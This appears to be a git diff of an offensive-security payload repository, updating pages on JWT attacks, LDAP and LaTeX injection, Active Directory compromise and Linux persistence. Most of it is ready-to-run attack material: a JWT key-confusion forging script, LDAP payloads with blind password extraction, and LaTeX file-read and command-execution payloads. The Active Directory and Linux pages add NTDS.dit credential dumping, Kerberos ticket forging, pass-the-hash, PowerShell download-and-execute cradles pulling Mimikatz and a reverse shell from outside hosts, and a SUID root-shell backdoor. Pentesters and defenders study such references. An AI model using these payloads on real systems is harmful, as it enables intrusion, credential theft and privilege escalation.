 Because the public key can sometimes be obtained by the attacker, the attacker can modify the algorithm in the header to HS256 and then use the RSA public key to sign the data.
 > The algorithm HS256 uses the secret key to sign and verify each message.
 > The algorithm RS256 uses the private key to sign the message and uses the public key for authentication.
 ```python
 import jwt
 public = open('public.pem', 'r').read()
 print public
 print jwt.encode({"data":"test"}, key=public, algorithm='HS256')
 ```
 Note: This behavior is fixed in the python library and will return this error `jwt.exceptions.InvalidKeyError: The specified key is an asymmetric key or x509 certificate and should not be used as an HMAC secret.`. You need to install the following version
 `pip install pyjwt==0.4.3`.
 ## Breaking JWT's secret
 Encode/Decode JWT with the secret.
 ```python
 import jwt
 encoded = jwt.encode({'some': 'payload'}, 'secret', algorithm='HS256') # encode with 'secret'
 encoded = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE"
 jwt.decode(encoded, 'Sn1f', algorithms=['HS256']) # decode with 'Sn1f' as the secret key
 # result
 {u'admin': True, u'sub': u'1234567890', u'name': u'John Doe'}
 ```
 ### JWT tool
 ```bash
 git clone https://github.com/ticarpi/jwt_tool
 python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw /usr/share/wordlists/rockyou.txt
 ```
 ### JWT cracker
 ```bash
 git clone https://github.com/brendan-rius/c-jwt-cracker
 ./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE
 Secret is "Sn1f"
 ```
 ### Hashcat
 > Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](twitter.com/hashcat/status/955154646494040065)
 ```bash
 /hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
 ```
 ## Thanks
 - [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
 - [WebSec CTF - Authorization Token - JWT Challenge](https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/)
 - [Privilege Escalation like a Boss - October 27, 2018 - janijay007](https://blog.securitybreached.org/2018/10/27/privilege-escalation-like-a-boss/)
 - [5 Easy Steps to Understanding JSON Web Token](https://medium.com/vandium-software/5-easy-steps-to-understanding-json-web-tokens-jwt-1164c0adfcec)
 - [Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify Blog](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
 - [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/)
--- a/injection/Intruders/LDAP_FUZZ.txt
+++ b/injection/Intruders/LDAP_FUZZ.txt
@@ -29,6 +29,7 @@ x' or name()='username' or 'x'='y
 &
 (
 )
 )(cn=))\x00
 *(|(mail=*))
 *(|(objectclass=*))
 */*
--- a/injection/Intruders/LDAP_attributes.txt
+++ b/injection/Intruders/LDAP_attributes.txt
@@ -0,0 +1,27 @@
 c
 cn
 co
 commonName
 dc
 facsimileTelephoneNumber
 givenName
 gn
 homePhone
 id
 jpegPhoto
 l
 mail
 mobile
 name
 o
 objectClass
 ou
 owner
 pager
 password
 sn
 st
 surname
 uid
 username
 userPassword
--- a/injection/README.md
+++ b/injection/README.md
@@ -1,27 +1,32 @@
 # LDAP injection
 LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.
 ## Exploitation
 Example 1.
-```
+
 ```sql
 user  = *)(uid=*))(|(uid=*
 pass  = password
 query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))"
 ```
 Example 2
-```
+
 ```sql
 user  = admin)(!(&(1=0
 pass  = q))
 query = (&(uid=admin)(!(&(1=0)(userPassword=q))))
 ```
 ## Payloads
-```
+
 ```text
 *
 *)(&
 *))%00
 )(cn=))\x00
 *()|%26'
 *()|&'
 *(|(mail=*))
@@ -41,8 +46,10 @@ x' or name()='username' or 'x'='y
 ```
 ## Blind Exploitation
 We can extract using a bypass login
-```
+
 ```sql
 (&(sn=administrator)(password=*))    : OK
 (&(sn=administrator)(password=A*))   : KO
 (&(sn=administrator)(password=B*))   : KO
@@ -60,6 +67,38 @@ We can extract using a bypass login
 (&(sn=administrator)(password=MYKE)) : OK
 ```
 ## Defaults attributes
 Can be used in an injection like `*)(ATTRIBUTE_HERE=*`
 ```bash
 userPassword
 surname
 name
 cn
 sn
 objectClass
 mail
 givenName
 commonName
 ```
 ## Exploiting userPassword attribute
 `userPassword` attribute is not a string like the `cn` attribute for example but it’s an OCTET STRING
 In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18).
 > octetStringOrderingMatch (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit.
 ```bash
 userPassword:2.5.13.18:=\xx (\xx is a byte)
 userPassword:2.5.13.18:=\xx\xx
 userPassword:2.5.13.18:=\xx\xx\xx
 ```
 ## Thanks to
 * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
 * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
 * [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/)
 * [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/)
--- a/injection/README.md
+++ b/injection/README.md
@@ -1,12 +1,14 @@
 # LaTex Injection
 ## Read file
 ```bash
 \input{/etc/passwd}
 \include{password} # load .tex file
 ```
 Read single lined file
 ```bash
 \newread\file
 \openin\file=/etc/issue
@@ -16,17 +18,26 @@ Read single lined file
 ```
 Read multiple lined file
 ```bash
 \newread\file
 \openin\file=/etc/passwd
 \loop\unless\ifeof\file
-    \read\file to\fileline 
+    \read\file to\fileline
    \text{\fileline}
 \repeat
 \closein\file
 ```
 Read text file, keep the formatting
 ```bash
 \usepackage{verbatim}
 \verbatiminput{/etc/passwd}
 ```
 ## Write file
 ```bash
 \newwrite\outfile
 \openout\outfile=cmd.tex
@@ -35,12 +46,16 @@ Read multiple lined file
 ```
 ## Command execution
 The input of the command will be redirected to stdin, use a temp file to get it.
 ```bash
 \immediate\write18{env > output}
 \input{output}
 ```
 If you get any LaTex error, consider using base64 to get the result without bad characters
 ```bash
 \immediate\write18{env | base64 > test.tex}
 \input{text.tex}
@@ -48,10 +63,11 @@ If you get any LaTex error, consider using base64 to get the result without bad
 ```bash
 \input|ls|base4
 \input{|"/bin/hostname"}
 ```
 ## Thanks to
 * [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
 * [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
 * [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
--- a/Resources/Active
+++ b/Resources/Active
@@ -1,12 +1,13 @@
 # Active Directory Attacks
 ## Summary
 * [Tools](#tools)
 * [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
  * [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
  * [Open Shares](#open-shares)
  * [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
-  * [Dumping AD Domain Credentials ](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
+  * [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
  * [Password in AD User comment](#password-in-ad-user-comment)
  * [Golden Tickets](#passtheticket-golden-tickets)
  * [Silver Tickets](#passtheticket-silver-tickets)
@@ -22,44 +23,51 @@
  * [PrivEsc Local Admin - MS17-010 (Eternal Blue)](#privesc-local-admin---ms17-010-eternal-blue)
  * [From Local Admin to Domain Admin](#from-local-admin-to-domain-admin)
 ## Tools
 * [Impacket](https://github.com/CoreSecurity/impacket) or the [Windows version](https://github.com/maaaaz/impacket-examples-windows)
 * [Responder](https://github.com/SpiderLabs/Responder)
 * [Mimikatz](https://github.com/gentilkiwi/mimikatz)
 * [Ranger](https://github.com/funkandwagnalls/ranger)
 * [BloodHound](https://github.com/BloodHoundAD/BloodHound)
-```powershell
+
-apt install bloodhound #kali
+  ```powershell
-neo4j console
+  apt install bloodhound #kali
-Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
+  neo4j console
-./bloodhound
+  Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
-SharpHound.exe (from resources/Ingestor)
+  ./bloodhound
-or 
+  SharpHound.exe (from resources/Ingestor)
-Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
+  or 
-```
+  Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
  ```
 * [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
 * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
-```bash
+
-git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
+  ```bash
-crackmapexec smb -L
+  git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
-crackmapexec smb -M name_module -o VAR=DATA
+  crackmapexec smb -L
-crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
+  crackmapexec smb -M name_module -o VAR=DATA
-crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
+  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
-crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
+  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
-crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
+  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
-crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
+  crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
-```
+  crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
  ```
 * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
-```powershell
+
-powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
+  ```powershell
-powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
+  powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
-```
+  powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
  ```
 * [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
 ## Most common paths to AD compromise
 ### MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
 ```bash
 Exploit Python: https://www.exploit-db.com/exploits/35474/
 Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
@@ -72,6 +80,7 @@ mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
 ```
 ## Open Shares
 ```powershell
 pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
 ls # list files
@@ -81,20 +90,23 @@ put # replace a file
 ```
 Mount a share
 ```powershell
 smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
 ```
 ### GPO - Pivoting with Local Admin & Passwords in SYSVOL
-:triangular_flag_on_post:	 GPO Priorization : Organization Unit > Domain > Site > Local
+
 :triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
 Find password in SYSVOL
 ```powershell
 findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
 ```
-Decrypt a password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280))
+Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280))
 ```bash
 echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
@@ -102,19 +114,22 @@ e.g: echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl e
 ```
 Metasploit modules to enumerate shares and credentials
 ```c
 scanner/smb/smb_enumshares
-windows/gather/enumshares
+post/windows/gather/enum_shares
-windows/gather/credentials/gpp
+post/windows/gather/credentials/gpp
 ```
 Crackmapexec modules
 ```powershell
 cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_autologin
 cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_password
 ```
-List all GPO for a domain 
+List all GPO for a domain
 ```powershell
 Get-GPO -domaine DOMAIN.COM -all
 Get-GPOReport -all -reporttype xml --all
@@ -124,9 +139,10 @@ Get-NetGPO
 Get-NetGPOGroup
 ```
 ### Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
-**Using ndtsutil**
+
 #### Using ndtsutil
 ```powershell
 C:\>ntdsutil
 ntdsutil: activate instance ntds
@@ -136,28 +152,31 @@ ifm: quit
 ntdsutil: quit
 ```
-**Using Vshadow**
+#### Using Vshadow
 ```powershell
 vssadmin create shadow /for=C :
 Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
 ```
 You can also use the Nishang script, available at : [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
 ```powershell
 Import-Module .\Copy-VSS.ps1
 Copy-VSS
 Copy-VSS -DestinationDir C:\ShadowCopy\
 ```
-**Using vssadmin**
+#### Using vssadmin
 ```powershell
 vssadmin create shadow /for=C:
 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
 ```
 #### Using DiskShadow (a Windows signed binary)
 **Using DiskShadow (a Windows signed binary)**
 ```powershell
 diskshadow.txt contains :
 set context persistent nowriters
@@ -175,46 +194,55 @@ dir c:\exfil
 reg.exe save hklm\system c:\exfil\system.bak
 ```
-**Extract hashes from ntds.dit**    
+#### Extract hashes from ntds.dit
 then you need to use secretsdump to extract the hashes
-```c
+
 ```java
 secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
 ```
 secretsdump also works remotely
-```c
+
 ```java
 ./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss
 ./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
 ```
 #### Alternatives - modules
 **Alternatives - modules**    
 Metasploit modules
 ```c
 windows/gather/credentials/domain_hashdump
 ```
 PowerSploit module
-```
+
 ```powershell
 Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
 ```
 CrackMapExec module
-```bash
+
 ```powershell
 cme smb 10.10.0.202 -u username -p password --ntds vss
 ```
 ### Password in AD User comment
 ```powershell
 enum4linux | grep -i desc
 There are 3-4 fields that seem to be common in most AD schemas: 
 UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
 ```
 ### PassTheTicket Golden Tickets
-Forge a TGT, require krbtgt key
+
 Forging a TGT require the krbtgt key
 Mimikatz version
 ```powershell
 Get info - Mimikatz
 lsadump::dcsync /user:krbtgt
@@ -227,7 +255,8 @@ kerberos::tgt
 ```
 Meterpreter version
-```c
+
 ```powershell
 Get info - Meterpreter(kiwi)
 dcsync_ntlm krbtgt
 dcsync krbtgt
@@ -242,6 +271,7 @@ kerberos_ticket_list
 ```
 Using a ticket on Linux
 ```powershell
 Convert the ticket kirbi to ccache with kekeo
 misc::convert ccache ticket.kirbi
@@ -262,7 +292,9 @@ NOTE: You may need to comment the proxy_dns setting in the proxychains configura
 ```
 ### PassTheTicket Silver Tickets
 Forging a TGS require machine accound password (key) from the KDC
 ```powershell
 Create a ticket for the service
 kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
@@ -274,10 +306,13 @@ export KRB5CCNAME=/home/user/ticket.ccache
 ```
 ### Trust Tickets
 TODO
 ### Kerberoast
-```c
+
 ```powershell
 https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf
 https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
 https://room362.com/post/2016/kerberoast-pt1/
@@ -285,15 +320,17 @@ https://room362.com/post/2016/kerberoast-pt1/
 (Impacket) Kerberoasting (ldap query, tgs in JTR format)
 ```
-### Pass-the-Hash 
+### Pass-the-Hash
 The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes.
-```c
+
 ```powershell
 use exploit/windows/smb/psexec
 set RHOST 10.2.0.3
 set SMBUser jarrieta
 set SMBPass nastyCutt3r  
-// NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
+# NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
-// NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
+# NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
 set PAYLOAD windows/meterpreter/bind_tcp
 run
 shell
@@ -310,13 +347,15 @@ sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm has
 ```
 ### OverPass-the-Hash (pass the key)
 Request a TGT with only the NT hash
-```
+
 ```powershell
 Using impacket
 ./getTGT.py -hashes :1a59bd44fe5bec39c44c8cd3524dee lab.ropnop.com
 chmod 600 tgwynn.ccache
-also with the AES Key if you have it 
+also with the AES Key if you have it
 ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
@@ -326,19 +365,24 @@ klist
 ```
 ### Dangerous Built-in Groups Usage
 AdminSDHolder
 ```powershell
 Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)"
 Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
-or 
+or
 ([adsisearcher]"(AdminCount=1)").findall()
 ```
 ### Trust relationship between domains
 ```powershell
 nltest /trusted_domains
 ```
-or 
+
 or
 ```powershell
 ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
@@ -347,11 +391,13 @@ SourceName          TargetName                    TrustType      TrustDirection
 domainA.local      domainB.local                  TreeRoot       Bidirectional
 ```
 ## Privilege Escalation
 ### PrivEsc Local Admin - Token Impersonation (RottenPotato)
-Binary available at : https://github.com/foxglovesec/RottenPotato      
+
-Binary available at : https://github.com/breenmachine/RottenPotatoNG   
+Binary available at : https://github.com/foxglovesec/RottenPotato
 Binary available at : https://github.com/breenmachine/RottenPotatoNG
 ```c
 getuid
 getprivs
@@ -368,10 +414,11 @@ Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
 Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
 ```
 ### PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
 Check if the patch is installed : `wmic qfe list | find "3139914"`
-```
+
 ```powershell
 Powershell:
 https://www.exploit-db.com/exploits/39719/
 https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
@@ -381,43 +428,44 @@ Binary exe : https://github.com/Meatballs1/ms16-032
 Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
 ```
 ### PrivEsc Local Admin - MS17-010 (Eternal Blue)
 ```c
 nmap -Pn -p445 — open — max-hostgroup 3 — script smb-vuln-ms17–010 <ip_netblock>
 ```
 ### From Local Admin to Domain Admin
 ```powershell
 net user hacker2 hacker123 /add /Domain
 net group "Domain Admins" hacker2 /add /domain
 ```
 ## Documentation / Thanks to
- * [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
+
- * [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
+* [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
- * [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)
+* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
- * [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/)
+* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)
- * [Dumping Domain Password Hashes - Pentestlab](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/)
+* [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/)
- * [Getting the goods with CrackMapExec: Part 1, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html)
+* [Dumping Domain Password Hashes - Pentestlab](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/)
- * [Getting the goods with CrackMapExec: Part 2, by byt3bl33d3r ](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html)
+* [Getting the goods with CrackMapExec: Part 1, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html)
- * [Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin](https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/)
+* [Getting the goods with CrackMapExec: Part 2, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html)
- * [Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/)
+* [Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin](https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/)
- * [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/)
+* [Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/)
- * [Pen Testing Active Directory Environments - Part III:  Chasing Power Users](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/)
+* [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/)
- * [Pen Testing Active Directory Environments - Part IV: Graph Fun](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/)
+* [Pen Testing Active Directory Environments - Part III:  Chasing Power Users](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/)
- * [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/)
+* [Pen Testing Active Directory Environments - Part IV: Graph Fun](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/)
- * [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
+* [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/)
- * [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
+* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
- * [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
+* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
- * [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
+* [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
- * [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/)
+* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
- * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 1](https://akerva.com/blog/wonkachall-akerva-ndh-2018-write-up-part-1/)
+* [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/)
- * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 2](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-2/)
+* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 1](https://akerva.com/blog/wonkachall-akerva-ndh-2018-write-up-part-1/)
- * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 3](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-3/)
+* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 2](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-2/)
- * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 4](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-4/)
+* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 3](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-3/)
- * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/)
+* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 4](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-4/)
- * [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf)
+* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/)
- * [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/)
+* [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf)
- * [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/)
+* [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/)
 * [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/)
--- a/Resources/Linux
+++ b/Resources/Linux
@@ -0,0 +1,130 @@
 # Linux - Persistence
 ## Basic reverse shell
 ```bash
 ncat --udp -lvp 4242
 ncat --sctp -lvp 4242
 ncat --tcp -lvp 4242
 ```
 ## Suid Binary
 ```powershell
 TMPDIR2="/var/tmp"
 echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c
 gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null
 rm $TMPDIR2/croissant.c
